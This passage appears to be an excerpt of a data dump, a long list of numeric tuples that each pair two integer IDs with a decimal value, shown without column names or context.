(261, 12746, 1.2),
(262, 12746, 1.2),
(263, 12746, 1.2),
(264, 12746, 1.2),
(265, 12746, 1.2),
(266, 12746, 1.2),
(267, 12746, 1.2),
(268, 12746, 1.2),
(269, 12746, 1.2),
(270, 12746, 1.2),
(272, 12746, 1.2),
(273, 12746, 1.2),
(274, 12746, 1.2),
(275, 12746, 1.2),
(280, 12746, 1.2),
(288, 12746, 1.2),
(290, 12746, 1.2),
(292, 12746, 1.2),
(294, 12746, 1.2),
(295, 12746, 1.2),
(298, 12746, 1.2),
(299, 12746, 1.2),
(301, 12746, 1.2),
(304, 12746, 1.2),
(305, 12746, 1.2),
(306, 12746, 1.2),
(308, 12746, 1.2),
(159, 12747, 2.8),
(160, 12747, 2.8),
(161, 12747, 2.8),
(168, 12747, 2.8),
(174, 12747, 2.8),
(178, 12747, 2.8),
(193, 12747, 2.8),
(233, 12747, 2.8),
(235, 12747, 2.8),
(236, 12747, 2.8),
(237, 12747, 2.8),
(238, 12747, 2.8),
(239, 12747, 2.8),
(240, 12747, 2.8),
(241, 12747, 2.8),
(242, 12747, 2.8),
(243, 12747, 2.8),
(244, 12747, 2.8),
(245, 12747, 2.8),
(246, 12747, 2.8),
(247, 12747, 2.8),
(248, 12747, 2.8),
(249, 12747, 2.8),
(250, 12747, 2.8),
(251, 12747, 2.8),
(252, 12747, 2.8),
(253, 12747, 2.8),
(254, 12747, 2.8),
(255, 12747, 2.8),
(256, 12747, 2.8),
(257, 12747, 2.8),
(258, 12747, 2.8),
(259, 12747, 2.8),
(260, 12747, 2.8),
(261, 12747, 2.8),
(262, 12747, 2.8),
(263, 12747, 2.8),
(264, 12747, 2.8),
(265, 12747, 2.8),
(266, 12747, 2.8),
(267, 12747, 2.8),
(268, 12747, 2.8),
(269, 12747, 2.8),
(270, 12747, 2.8),
(272, 12747, 2.8),
(273, 12747, 2.8),
(274, 12747, 2.8),
(275, 12747, 2.8),
(280, 12747, 2.8),
(288, 12747, 2.8),
(290, 12747, 2.8),
(292, 12747, 2.8),
(294, 12747, 2.8),
(295, 12747, 2.8),
(298, 12747, 2.8),
(299, 12747, 2.8),
(301, 12747, 2.8),
(304, 12747, 2.8),
(305, 12747, 2.8),
(306, 12747, 2.8),
(308, 12747, 2.8),
(159, 12748, 3.1334),
(160, 12748, 3.1334),
(161, 12748, 3.1334),
(168, 12748, 3.1334),
(174, 12748, 3.1334),
(178, 12748, 3.1334),
(193, 12748, 3.1334),
(233, 12748, 3.1334),
(235, 12748, 3.1334),
(236, 12748, 3.1334),
(237, 12748, 3.1334),
(238, 12748, 3.1334),
(239, 12748, 3.1334),
(240, 12748, 3.1334),
(241, 12748, 3.1334),
(242, 12748, 3.1334),
(243, 12748, 3.1334),
(244, 12748, 3.1334),
(245, 12748, 3.1334),
(246, 12748, 3.1334),
(247, 12748, 3.1334),
(248, 12748, 3.1334),
(249, 12748, 3.1334),
(250, 12748, 3.1334),
(251, 12748, 3.1334),
(252, 12748, 3.1334),
(253, 12748, 3.1334),
(254, 12748, 3.1334),
(255, 12748, 3.1334),
(256, 12748, 3.1334),
(257, 12748, 3.1334),
(258, 12748, 3.1334),
(259, 12748, 3.1334),
(260, 12748, 3.1334),
(261, 12748, 3.1334),
(262, 12748, 3.1334),
(263, 12748, 3.1334),
(264, 12748, 3.1334),
(265, 12748, 3.1334),
(266, 12748, 3.1334),
(267, 12748, 3.1334),
(268, 12748, 3.1334),
(269, 12748, 3.1334),
(270, 12748, 3.1334),
(272, 12748, 3.1334),
(273, 12748, 3.1334),
(274, 12748, 3.1334),
(275, 12748, 3.1334),
(280, 12748, 3.1334),
(288, 12748, 3.1334),
(290, 12748, 3.1334),
(292, 12748, 3.1334),
(294, 12748, 3.1334),
(295, 12748, 3.1334),
(298, 12748, 3.1334),
(299, 12748, 3.1334),
(301, 12748, 3.1334),
(304, 12748, 3.1334),
(305, 12748, 3.1334),
(306, 12748, 3.1334),
(308, 12748, 3.1334),
(252, 13141, 0.18669),
(269, 13141, 0.18669),
(288, 13141, 0.18669),
(233, 13147, 0.18669),
(240, 13147, 0.18669),
(243, 13147, 0.18669),
(249, 13147, 0.18669),
(252, 13147, 0.18669),
(262, 13147, 0.18669),
(287, 13147, 0.18669),
(298, 13147, 0.18669),
(308, 13147, 0.18669),
(240, 13148, 0.91),
(252, 13148, 0.91),
(168, 13150, 0.32669),
(178, 13150, 0.32669),
(193, 13150, 0.32669),
(244, 13150, 0.32669),
(249, 13150, 0.32669),
(252, 13150, 0.32669),
(272, 13150, 0.32669),
(275, 13150, 0.32669),
(280, 13150, 0.32669),
(299, 13150, 0.32669),
(264, 13150, 0.65338),
(233, 13150, 2.98688),
(233, 13151, 0.95669),
(252, 13151, 0.95669),
(264, 13151, 0.95669),
(299, 13151, 0.95669),
(237, 13153, 0.37331),
(252, 13153, 0.37331),
(257, 13153, 0.37331),
(264, 13153, 0.37331),
(239, 13156, 0.37331),
(252, 13156, 0.37331),
(306, 13156, 0.74662),
(236, 13159, 0.23331),
(239, 13159, 0.23331),
(242, 13159, 0.23331),
(252, 13159, 0.23331),
(258, 13159, 0.23331),
(263, 13159, 0.23331),
(264, 13159, 0.23331),
(272, 13159, 0.23331),
(280, 13159, 0.23331),
(304, 13159, 0.23331),
(305, 13159, 0.23331),
(178, 13159, 0.46662),
(248, 13159, 0.46662),
(274, 13159, 0.46662),
(238, 13159, 0.69993),
(245, 13159, 0.69993),
(255, 13159, 0.69993),
(174, 13159, 1.39986),
(254, 13159, 1.63317),
(252, 13160, 0.91),
(254, 13160, 0.91),
(174, 13160, 1.82),
(241, 13428, 0.18669),
(255, 13428, 0.18669),
(258, 13428, 0.18669),
(298, 13428, 0.18669),
(306, 13428, 0.18669),
(308, 13428, 0.18669),
(237, 13428, 0.37338),
(252, 13428, 0.37338),
(256, 13428, 0.37338),
(253, 13428, 0.56007),
(287, 13428, 0.93345),
(254, 13428, 1.30683),
(265, 13433, 0.23331),
(266, 13433, 0.23331),
(290, 13433, 0.23331),
(292, 13433, 0.23331),
(304, 13433, 0.23331),
(305, 13433, 0.23331),
(306, 13433, 0.23331),
(252, 13433, 0.46662),
(263, 13433, 0.69993),
(168, 13438, 0.86331),
(243, 13438, 0.86331),
(244, 13438, 0.86331),
(245, 13438, 0.86331),
(246, 13438, 0.86331),
(247, 13438, 0.86331),
(259, 13438, 0.86331),
(260, 13438, 0.86331),
(265, 13438, 0.86331),
(266, 13438, 0.86331),
(269, 13438, 0.86331),
(290, 13438, 0.86331),
(298, 13438, 0.86331),
(304, 13438, 0.86331),
(305, 13438, 0.86331),
(308, 13438, 0.86331),
(174, 13438, 1.72662),
(235, 13438, 1.72662),
(238, 13438, 1.72662),
(239, 13438, 1.72662),
(240, 13438, 1.72662),
(241, 13438, 1.72662),
(255, 13438, 1.72662),
(262, 13438, 1.72662),
(292, 13438, 1.72662),
(299, 13438, 1.72662),
(242, 13438, 2.58993),
(256, 13438, 2.58993),
(257, 13438, 2.58993),
(263, 13438, 2.58993),
(268, 13438, 2.58993),
(270, 13438, 2.58993),
(274, 13438, 2.58993),
(301, 13438, 2.58993),
(252, 13438, 3.45324),
(254, 13438, 3.45324),
(306, 13438, 3.45324),
(193, 13438, 5.17986),
(237, 13438, 5.17986),
(261, 13438, 6.90648),
(275, 13438, 7.89312),
(252, 13440, 1.00331),
(261, 13440, 2.00662),
(178, 13442, 0.86331),
(193, 13442, 0.86331),
(243, 13442, 0.86331),
(252, 13442, 0.86331),
(256, 13442, 0.86331),
(258, 13442, 0.86331),
(267, 13442, 0.86331),
(272, 13442, 0.86331),
(280, 13442, 0.86331),
(292, 13442, 0.86331),
(295, 13442, 0.86331),
(298, 13442, 0.86331),
(305, 13442, 0.86331),
(308, 13442, 0.86331),
(240, 13442, 1.72662),
(241, 13442, 1.72662),
(263, 13442, 1.72662),
(174, 13442, 2.58993),
(168, 13445, 0.86331),
(252, 13445, 0.86331),
(174, 13449, 0.88669),
(233, 13449, 0.88669),
(236, 13449, 0.88669),
(243, 13449, 0.88669),
(244, 13449, 0.88669),
(246, 13449, 0.88669),
(256, 13449, 0.88669),
(257, 13449, 0.88669),
(261, 13449, 0.88669),
(262, 13449, 0.88669),
(263, 13449, 0.88669),
(264, 13449, 0.88669),
(268, 13449, 0.88669),
(272, 13449, 0.88669),
(273, 13449, 0.88669),
(275, 13449, 0.88669),
(280, 13449, 0.88669),
(292, 13449, 0.88669),
(193, 13449, 1.77338),
(237, 13449, 1.77338),
(241, 13449, 1.77338),
(305, 13449, 1.77338),
(242, 13449, 2.66007),
(299, 13449, 2.66007),
(252, 13449, 3.54676),
(306, 13449, 7.98021),
(193, 13450, 1.00331),
(252, 13450, 1.00331),
(244, 13454, 0.84),
(248, 13454, 0.84),
(252, 13454, 0.84),
(257, 13454, 0.84),
(258, 13454, 0.84),
(259, 13454, 0.84),
(260, 13454, 0.84),
(263, 13454, 0.84),
(265, 13454, 0.84),
(266, 13454, 0.84),
(270, 13454, 0.84),
(273, 13454, 0.84),
(288, 13454, 0.84),
(299, 13454, 0.84),
(301, 13454, 0.84),
(305, 13454, 0.84),
(306, 13454, 0.84),
(248, 13455, 1.00331),
(252, 13455, 1.00331),
(263, 13455, 1.00331),
(273, 13455, 1.00331),
(288, 13455, 1.00331),
(240, 13456, 0.88669),
(241, 13456, 0.88669),
(242, 13456, 0.88669),
(243, 13456, 0.88669),
(252, 13456, 0.88669),
(255, 13456, 0.88669),
(257, 13456, 0.88669),
(261, 13456, 0.88669),
(306, 13456, 2.66007),
(235, 13458, 0.88669),
(241, 13458, 0.88669),
(244, 13458, 0.88669),
(246, 13458, 0.88669),
(252, 13458, 0.88669),
(253, 13458, 0.88669),
(255, 13458, 0.88669),
(265, 13458, 0.88669),
(266, 13458, 0.88669),
(267, 13458, 0.88669),
(275, 13458, 0.88669),
(292, 13458, 0.88669),
(238, 13458, 1.77338),
(256, 13458, 1.77338),
(257, 13458, 1.77338),
(259, 13458, 1.77338),
(260, 13458, 1.77338),
(269, 13458, 1.77338),
(288, 13458, 1.77338),
(174, 13458, 2.66007),
(237, 13458, 2.66007),
(261, 13458, 2.66007),
(263, 13458, 2.66007),
(305, 13458, 2.66007),
(306, 13458, 2.66007),
(270, 13458, 3.54676),
(301, 13458, 3.54676),
(254, 13458, 4.43345),
(242, 13458, 6.20683),
(239, 13458, 7.98021),
(240, 13458, 7.98021),
(254, 13460, 0.88669),
(262, 13460, 0.88669),
(263, 13460, 0.88669),
(264, 13460, 0.88669),
(270, 13460, 0.88669),
(274, 13460, 0.88669),
(290, 13460, 0.88669),
(299, 13460, 0.88669),
(301, 13460, 0.88669),
(305, 13460, 0.88669),
(193, 13460, 1.77338),
(242, 13460, 1.77338),
(240, 13460, 2.66007),
(304, 13460, 2.66007),
(252, 13460, 3.54676),
(252, 13463, 0.95669),
(254, 13463, 0.95669),
(262, 13463, 0.95669),
(263, 13463, 0.95669),
(264, 13463, 0.95669),
(270, 13463, 0.95669),
(274, 13463, 0.95669),
(290, 13463, 0.95669),
(299, 13463, 0.95669),
(301, 13463, 0.95669),
(193, 13463, 1.91338),
(242, 13463, 1.91338),
(240, 13463, 2.87007),
(252, 13465, 0.95669),
(275, 13465, 0.95669),
(168, 13471, 0.91),
(239, 13471, 0.91),
(241, 13471, 0.91),
(269, 13471, 0.91),
(305, 13471, 1.82),
(306, 13471, 1.82),
(252, 13471, 5.46),
(168, 13472, 0.88669),
(193, 13472, 0.88669),
(233, 13472, 0.88669),
(239, 13472, 0.88669),
(255, 13472, 0.88669),
(257, 13472, 0.88669),
(259, 13472, 0.88669),
(260, 13472, 0.88669),
(263, 13472, 0.88669),
(265, 13472, 0.88669),
(266, 13472, 0.88669),
(267, 13472, 0.88669),
(269, 13472, 0.88669),
(292, 13472, 0.88669),
(174, 13472, 1.77338),
(252, 13472, 1.77338),
(273, 13472, 1.77338),
(305, 13472, 1.77338),
(306, 13472, 1.77338),
(238, 13472, 2.66007),
(254, 13472, 2.66007),
(256, 13472, 2.66007),
(268, 13472, 2.66007),
(288, 13472, 3.54676),
(241, 13472, 5.32014),
(241, 13473, 0.95669),
(252, 13473, 1.91338),
(242, 13476, 0.91),
(252, 13476, 0.91),
(261, 13476, 0.91),
(299, 13476, 0.91),
(240, 13480, 0.95669),
(252, 13480, 0.95669),
(257, 13480, 0.95669),
(298, 13480, 0.95669),
(304, 13480, 0.95669),
(308, 13480, 0.95669),
(261, 13480, 1.91338),
(267, 13480, 1.91338),
(262, 13480, 22.0039),
(193, 15727, 0.07),
(239, 15727, 0.07),
(243, 15727, 0.07),
(246, 15727, 0.07),
(253, 15727, 0.07),
(287, 15727, 0.07),
(304, 15727, 0.07),
(305, 15727, 0.07),
(168, 15727, 0.14),
(178, 15727, 0.14),
(236, 15727, 0.14),
(267, 15727, 0.14),
(269, 15727, 0.14),
(299, 15727, 0.14),
(47, 15727, 0.2),
(233, 15727, 0.37),
(233, 16029, 0.18669),
(236, 16029, 0.18669),
(242, 16029, 0.18669),
(253, 16029, 0.18669),
(275, 16029, 0.18669),
(290, 16029, 0.18669),
(299, 16029, 0.18669),
(238, 16029, 0.37338),
(263, 16029, 0.37338),
(273, 16029, 0.37338),
(178, 16029, 0.56007),
(292, 16029, 0.74676),
(242, 16086, 0.46669),
(246, 16086, 0.46669),
(298, 16086, 0.46669),
(299, 16086, 0.46669),
(304, 16086, 0.46669),
(308, 16086, 0.46669),
(256, 16086, 0.93338),
(178, 16086, 4.26688),
(235, 16095, 0.14),
(248, 16095, 0.14),
(264, 16095, 0.14),
(299, 16095, 0.14),
(233, 16095, 0.28),
(236, 16095, 0.28),
(238, 17287, 0.28),
(239, 17287, 0.28),
(263, 17287, 0.28),
(298, 17287, 0.28),
(299, 17287, 0.28),
(308, 17287, 0.28),
(242, 17287, 1.12),
(193, 17296, 0.93331),
(240, 17296, 0.93331),
(243, 17296, 0.93331),
(265, 17296, 0.93331),
(266, 17296, 0.93331),
(298, 17296, 0.93331),
(299, 17296, 0.93331),
(308, 17296, 0.93331),
(254, 17296, 1.86662),
(255, 17296, 2.79993),
(178, 20933, 0.28),
(233, 20933, 0.28),
(246, 20933, 0.28),
(258, 20933, 0.28),
(269, 20933, 0.28),
(292, 20933, 0.28),
(238, 20933, 0.56),
(239, 20933, 0.56),
(240, 20933, 0.56),
(241, 20933, 0.56),
(253, 20933, 0.56),
(270, 20933, 0.56),
(301, 20933, 0.56),
(306, 20933, 0.84),
(233, 20936, 0.98),
(253, 20936, 0.98),
(233, 20938, 0.37331),
(238, 20938, 0.37331),
(244, 20938, 0.37331),
(258, 20938, 0.37331),
(264, 20938, 0.37331),
(272, 20938, 0.37331),
(280, 20938, 0.37331),
(168, 20938, 0.74662),
(236, 20938, 0.74662),
(241, 20938, 0.74662),
(178, 20938, 1.49324),
(174, 20938, 10.506),
(233, 20945, 0.28),
(236, 20945, 0.28),
(243, 20945, 0.28),
(257, 20945, 0.28),
(267, 20945, 0.28),
(269, 20945, 0.28),
(295, 20945, 0.28),
(238, 20945, 0.84),
(235, 20945, 5.64),
(233, 21201, 0.28),
(235, 21201, 0.28),
(240, 21201, 0.56),
(242, 21201, 0.56),
(239, 21201, 0.96),
(233, 21202, 0.88669),
(235, 21202, 0.88669),
(239, 21202, 0.88669),
(233, 21308, 0.14),
(236, 21308, 0.14),
(243, 21308, 0.14),
(263, 21308, 0.14),
(268, 21308, 0.14),
(288, 21308, 0.14),
(306, 21308, 0.14),
(178, 21308, 0.28),
(243, 21316, 0.86331),
(244, 21316, 0.86331),
(253, 21316, 0.86331),
(256, 21316, 0.86331),
(257, 21316, 0.86331),
(273, 21316, 0.86331),
(233, 21316, 2.58993),
(237, 21316, 3.45324),
(233, 21319, 0.98),
(244, 21319, 0.98),
(233, 21320, 0.84),
(240, 21320, 0.84),
(268, 21320, 0.84),
(270, 21320, 0.84),
(301, 21320, 0.84),
(233, 21322, 0.95669),
(237, 21322, 0.95669),
(242, 21322, 0.95669),
(246, 21322, 0.95669),
(264, 21322, 0.95669),
(306, 21322, 2.87007),
(233, 21323, 0.84),
(241, 21323, 0.84),
(257, 21323, 0.84),
(269, 21323, 0.84),
(233, 21327, 1.02669),
(265, 21327, 1.02669),
(266, 21327, 1.02669),
(288, 21327, 1.02669),
(168, 21330, 1.00331),
(233, 21330, 1.00331),
(174, 21330, 14.0463),
(239, 22890, 0.77),
(299, 22890, 0.77),
(193, 22892, 0.28),
(246, 22892, 0.28),
(299, 22892, 0.28),
(168, 23183, 0.84),
(178, 23183, 0.84),
(237, 23183, 0.84),
(239, 23183, 0.84),
(263, 23183, 0.84),
(272, 23183, 0.84),
(280, 23183, 0.84),
(299, 23183, 0.84),
(240, 23183, 1.68),
(236, 23195, 0.23331),
(259, 23195, 0.23331),
(260, 23195, 0.23331),
(261, 23195, 0.23331),
(273, 23195, 0.23331),
(274, 23195, 0.23331),
(299, 23195, 0.23331),
(174, 23201, 0.28),
(238, 23201, 0.28),
(239, 23201, 0.28),
(243, 23201, 0.28),
(246, 23201, 0.28),
(248, 23201, 0.28),
(253, 23201, 0.28),
(269, 23201, 0.28),
(306, 23201, 0.28),
(242, 23201, 0.56),
(287, 23201, 0.56),
(178, 23201, 1.12),
(299, 23201, 1.12),
(244, 23201, 1.4),
(236, 23201, 1.68),
(235, 23201, 3.56),
(178, 23206, 0.98),
(269, 23206, 0.98),
(299, 23206, 1.96),
(168, 23209, 0.28),
(236, 23209, 0.28),
(238, 23209, 0.28),
(242, 23209, 0.28),
(244, 23209, 0.28),
(259, 23209, 0.28),
(260, 23209, 0.28),
(261, 23209, 0.28),
(265, 23209, 0.28),
(266, 23209, 0.28),
(267, 23209, 0.28),
(287, 23209, 0.28),
(292, 23209, 0.28),
(295, 23209, 0.28),
(299, 23209, 0.28),
(255, 23209, 0.56),
(272, 23209, 0.56),
(280, 23209, 0.56),
(235, 23209, 1.4),
(239, 23209, 1.4),
(240, 23209, 1.4),
(243, 23209, 1.4),
(239, 23212, 0.37331),
(243, 23212, 0.37331),
(299, 23212, 0.37331),
(244, 23215, 0.91),
(299, 23215, 0.91),
(244, 23216, 1.00331),
(299, 23216, 1.00331),
(178, 23219, 0.86331),
(239, 23219, 0.86331),
(267, 23219, 0.86331),
(275, 23219, 0.86331),
(290, 23219, 0.86331),
(299, 23219, 0.86331),
(241, 23219, 1.72662),
(292, 23219, 1.72662),
(305, 23219, 1.72662),
(306, 23219, 1.72662),
(244, 23219, 2.58993),
(275, 23220, 0.95669),
(299, 23220, 0.95669),
(299, 23223, 0.88669),
(242, 23223, 1.77338),
(258, 23223, 2.66007),
(238, 23225, 0.42),
(265, 23225, 0.42),
(266, 23225, 0.42),
(269, 23225, 0.42),
(299, 23225, 0.42),
(304, 23225, 0.42),
(243, 23225, 1.68),
(274, 23225, 3.42),
(238, 23226, 0.98),
(265, 23226, 0.98),
(266, 23226, 0.98),
(269, 23226, 0.98),
(299, 23226, 0.98),
(304, 23226, 0.98),
(243, 23226, 3.92),
(274, 23226, 7.98),
(262, 23231, 0.32669),
(265, 23231, 0.65338),
(266, 23231, 0.65338),
(299, 23231, 0.65338),
(244, 23240, 0.42),
(299, 23240, 0.42),
(244, 23241, 1.02669),
(299, 23241, 1.02669),
(244, 23242, 1.14331),
(299, 23242, 1.14331),
(244, 23245, 0.37331),
(246, 23245, 0.37331),
(299, 23245, 0.37331),
(261, 23251, 0.37331),
(273, 23251, 0.37331),
(288, 23251, 0.37331),
(299, 23251, 0.37331),
(306, 23251, 0.37331),
(244, 23251, 1.27992),
(235, 23904, 0.28),
(244, 23904, 0.28),
(299, 23904, 0.28),
(306, 23904, 0.28),
(235, 23910, 0.32669),
(265, 23910, 0.32669),
(266, 23910, 0.32669),
(299, 23910, 0.32669),
(242, 23913, 0.32669),
(299, 23913, 0.98007),
(242, 23914, 0.98),
(299, 23914, 0.98),
(244, 23921, 0.46669),
(299, 23921, 0.46669),
(244, 23922, 1.07331),
(299, 23922, 1.07331),
(244, 23923, 1.19),
(299, 23923, 1.19),
(299, 23924, 0.56),
(306, 23924, 0.56),
(174, 23924, 1.68),
(305, 23924, 1.68),
(242, 23924, 2.24),
(174, 23925, 1.09669),
(299, 23925, 1.09669),
(306, 23925, 1.09669),
(305, 23925, 2.19338),
(242, 23925, 3.29007),
(236, 23927, 0.42),
(299, 23927, 0.42),
(242, 23927, 1.26),
(244, 23930, 0.46669),
(299, 23930, 0.46669),
(178, 23939, 0.60669),
(193, 23939, 0.60669),
(235, 23939, 0.60669),
(238, 23939, 0.60669),
(240, 23939, 0.60669),
(299, 23939, 1.21338),
(299, 24366, 0.09331),
(305, 24366, 0.09331),
(258, 24366, 0.27993),
(178, 24366, 0.37324),
(244, 24366, 0.37324),
(246, 24366, 0.55986),
(244, 24367, 0.98),
(299, 24367, 0.98),
(244, 24368, 1.07331),
(299, 24368, 1.07331),
(262, 24369, 0.91),
(299, 24369, 0.91),
(306, 24369, 0.91),
(193, 24369, 1.82),
(237, 24369, 1.82),
(257, 24369, 1.82),
(238, 24373, 0.84),
(245, 24373, 0.84),
(256, 24373, 0.84),
(299, 24373, 0.84),
(259, 24375, 0.95669),
(260, 24375, 0.95669),
(262, 24375, 0.95669),
(299, 24375, 0.95669),
(193, 24381, 0.84),
(239, 24381, 0.84),
(240, 24381, 0.84),
(246, 24381, 0.84),
(267, 24381, 0.84),
(268, 24381, 0.84),
(305, 24381, 0.84),
(259, 24381, 1.68),
(260, 24381, 1.68),
(261, 24381, 1.68),
(269, 24381, 1.68),
(299, 24381, 1.68),
(306, 24381, 1.68),
(267, 24382, 0.98),
(299, 24382, 0.98),
(261, 24387, 0.88669),
(299, 24387, 0.88669),
(237, 24389, 0.93331),
(262, 24389, 0.93331),
(299, 24389, 0.93331),
(305, 24389, 0.93331),
(270, 24393, 0.93331),
(299, 24393, 0.93331),
(301, 24393, 0.93331),
(241, 24396, 0.88669),
(299, 24396, 1.77338),
(257, 24398, 0.95669),
(262, 24398, 0.95669),
(272, 24398, 0.95669),
(275, 24398, 0.95669),
(280, 24398, 0.95669),
(299, 24398, 0.95669),
(240, 24400, 0.88669),
(299, 24400, 0.88669),
(305, 24400, 0.88669),
(240, 24401, 0.95669),
(299, 24401, 0.95669),
(242, 24404, 0.28),
(299, 24404, 0.28),
(249, 24404, 0.56),
(240, 24404, 0.84),
(248, 24404, 0.84),
(248, 24405, 0.91),
(299, 24405, 0.91),
(249, 24409, 0.23331),
(299, 24409, 0.23331),
(174, 24409, 0.46662),
(178, 24409, 0.46662),
(253, 24409, 0.46662),
(292, 24409, 0.46662),
(174, 24410, 0.91),
(299, 24410, 0.91),
(261, 24420, 1.00331),
(288, 24420, 2.00662),
(299, 24420, 2.00662),
(244, 24422, 0.91),
(299, 24422, 1.82),
(244, 24424, 1.00331),
(299, 24424, 1.00331),
(308, 24982, 0.93331),
(269, 24982, 2.79993),
(264, 24986, 0.91),
(298, 24986, 0.91),
(308, 24986, 0.91),
(265, 24988, 0.18669),
(266, 24988, 0.18669),
(298, 24988, 0.18669),
(308, 24988, 0.18669),
(178, 24988, 0.37338),
(239, 24988, 0.56007),
(306, 24988, 0.56007),
(249, 24993, 0.93331),
(298, 24993, 0.93331),
(308, 24993, 0.93331),
(249, 24994, 1.05),
(298, 24994, 1.05),
(308, 24994, 1.05),
(238, 24997, 0.46669),
(241, 24997, 0.46669),
(246, 24997, 0.46669),
(247, 24997, 0.46669),
(264, 24997, 0.46669),
(298, 24997, 0.46669),
(308, 24997, 0.46669),
(292, 24997, 0.93338),
(242, 24997, 1.40007),
(243, 24997, 3.73352),
(240, 24997, 4.6669),
(239, 24997, 7.00035),
(239, 24998, 1.02669),
(264, 24998, 1.02669),
(298, 24998, 1.02669),
(308, 24998, 1.02669),
(240, 24998, 2.05338),
(264, 25003, 0.98),
(298, 25003, 0.98),
(304, 25003, 0.98),
(308, 25003, 0.98),
(168, 25011, 0.46669),
(240, 25011, 0.46669),
(242, 25011, 0.46669),
(255, 25011, 0.46669),
(298, 25011, 0.46669),
(308, 25011, 0.46669),
(254, 25011, 0.93338),
(242, 25014, 1.00331),
(298, 25014, 1.00331),
(304, 25014, 1.00331),
(308, 25014, 1.00331),
(236, 25016, 0.46669),
(245, 25016, 0.46669),
(262, 25016, 0.46669),
(298, 25016, 0.46669),
(304, 25016, 0.46669),
(305, 25016, 0.46669),
(308, 25016, 0.46669),
(246, 25016, 0.93338),
(248, 25016, 0.93338),
(193, 25019, 0.37331),
(298, 25019, 0.37331),
(308, 25019, 0.37331),
(242, 25024, 0.28),
(261, 25024, 0.28),
(298, 25024, 0.28),
(308, 25024, 0.28),
(262, 25281, 0.88669),
(298, 25281, 0.88669),
(308, 25281, 0.88669),
(262, 25286, 0.28),
(272, 25286, 0.28),
(280, 25286, 0.28),
(308, 25286, 0.28),
(298, 25286, 0.56),
(193, 25292, 0.32669),
(242, 25292, 0.32669),
(267, 25292, 0.32669),
(298, 25292, 0.32669),
(308, 25292, 0.32669),
(247, 25295, 0.42),
(267, 25295, 0.42),
(304, 25295, 0.42),
(193, 25295, 0.84),
(298, 25295, 0.84),
(308, 25295, 0.84),
(178, 25300, 0.18669),
(245, 25300, 0.18669),
(248, 25300, 0.18669),
(298, 25300, 0.18669),
(308, 25300, 0.18669),
(174, 25492, 0.95669),
(235, 25492, 0.95669),
(237, 25492, 0.95669),
(239, 25492, 0.95669),
(254, 25492, 0.95669),
(263, 25492, 0.95669),
(298, 25492, 0.95669),
(308, 25492, 0.95669),
(261, 25492, 1.91338),
(174, 25502, 0.93331),
(239, 25502, 0.93331),
(242, 25502, 0.93331),
(261, 25502, 0.93331),
(263, 25502, 0.93331),
(264, 25502, 0.93331),
(265, 25502, 0.93331),
(266, 25502, 0.93331),
(298, 25502, 0.93331),
(305, 25502, 0.93331),
(308, 25502, 0.93331),
(193, 25502, 2.79993),
(298, 25511, 1.05),
(304, 25511, 1.05),
(308, 25511, 1.05),
(256, 25511, 2.1),
(236, 25513, 1.05),
(246, 25513, 1.05),
(262, 25513, 1.05),
(298, 25513, 1.05),
(305, 25513, 1.05),
(308, 25513, 1.05),
(267, 25523, 1.14331),
(298, 25523, 1.14331),
(308, 25523, 1.14331),
(193, 25524, 1.02669),
(242, 25524, 1.02669),
(298, 25524, 1.02669),
(308, 25524, 1.02669),
(262, 25524, 3.08007),
(265, 25526, 0.93331),
(266, 25526, 0.93331),
(298, 25526, 0.93331),
(308, 25526, 0.93331),
(242, 25526, 3.73324),
(44, 25916, 2.27323),
(44, 25917, 5.06323),
(44, 25918, 2.52),
(44, 25919, 3.1334),
(45, 25919, 3.1334),
(46, 25919, 3.1334),
(47, 25919, 3.1334),
(48, 25919, 3.1334),
(49, 25919, 3.1334),
(50, 25919, 3.1334),
(44, 25920, 3.5334),
(45, 25920, 3.5334),
(46, 25920, 3.5334),
(47, 25920, 3.5334),
(48, 25920, 3.5334),
(49, 25920, 3.5334),
(50, 25920, 3.5334),
(46, 25992, 0.90661),
(47, 26003, 2.5334),
(47, 26004, 2.6666),
(292, 26066, 0.46669),
(50, 26066, 1.13339),
(193, 28284, 0.42),
(235, 28284, 0.42),
(253, 28284, 0.42),
(243, 28284, 0.84),
(193, 28291, 0.23331),
(236, 28291, 0.23331),
(238, 28291, 0.23331),
(263, 28291, 0.23331),
(269, 28291, 0.23331),
(272, 28291, 0.23331),
(280, 28291, 0.23331),
(292, 28291, 0.23331),
(304, 28291, 0.23331),
(245, 28291, 0.46662),
(253, 28291, 0.46662),
(243, 28291, 0.69993),
(248, 28291, 0.69993),
(306, 28291, 0.69993),
(193, 28292, 0.88669),
(253, 28292, 0.88669),
(304, 28292, 0.88669),
(245, 28292, 1.77338),
(193, 28293, 0.93331),
(253, 28293, 0.93331),
(193, 29029, 0.93331),
(240, 29029, 0.93331),
(253, 29029, 10.2664),
(193, 31638, 0.65338),
(254, 31638, 0.98007),
(193, 33077, 0.86331),
(241, 33077, 0.86331),
(245, 33077, 0.86331),
(265, 33077, 0.86331),
(266, 33077, 0.86331),
(267, 33077, 0.86331),
(254, 33077, 1.72662),
(236, 33112, 0.93331),
(239, 33112, 0.93331),
(305, 33112, 0.93331),
(193, 33112, 2.79993),
(253, 36320, 0.81669),
(269, 36320, 0.81669),
(253, 36450, 0.32669),
(275, 36450, 0.32669),
(254, 36450, 1.30676),
(253, 36451, 0.98),
(275, 36451, 0.98),
(253, 36452, 1.09669),
(275, 36452, 1.09669),
(242, 36453, 0.46669),
(243, 36453, 0.46669),
(253, 36453, 0.46669),
(248, 36458, 0.46669),
(253, 36458, 0.46669),
(263, 36458, 0.46669),
(253, 36461, 0.56),
(274, 36461, 0.56),
(243, 36467, 0.98),
(253, 36467, 0.98),
(249, 36470, 0.37331),
(253, 36470, 0.37331),
(240, 36935, 0.23331),
(242, 36935, 0.23331),
(249, 36935, 0.23331),
(253, 36935, 0.23331),
(267, 36935, 0.23331),
(272, 36935, 0.23331),
(280, 36935, 0.23331),
(288, 36935, 0.23331),
(295, 36935, 0.23331),
(235, 36935, 0.46662),
(246, 36935, 0.46662),
(261, 36935, 0.69993),
(254, 36935, 0.93324),
(240, 36936, 0.88669),
(249, 36936, 0.88669),
(253, 36936, 0.88669),
(254, 36936, 0.88669),
(246, 36936, 1.77338),
(178, 36938, 0.28),
(236, 36938, 0.28),
(253, 36938, 0.28),
(257, 36938, 0.28),
(272, 36938, 0.28),
(280, 36938, 0.28),
(253, 36939, 0.98),
(272, 36939, 0.98),
(280, 36939, 0.98),
(238, 36941, 0.51331),
(253, 36941, 0.51331),
(237, 36944, 1.14331),
(241, 36944, 1.14331),
(253, 36944, 1.14331),
(254, 36944, 1.14331),
(255, 36944, 1.14331),
(257, 36944, 1.14331),
(258, 36944, 1.14331),
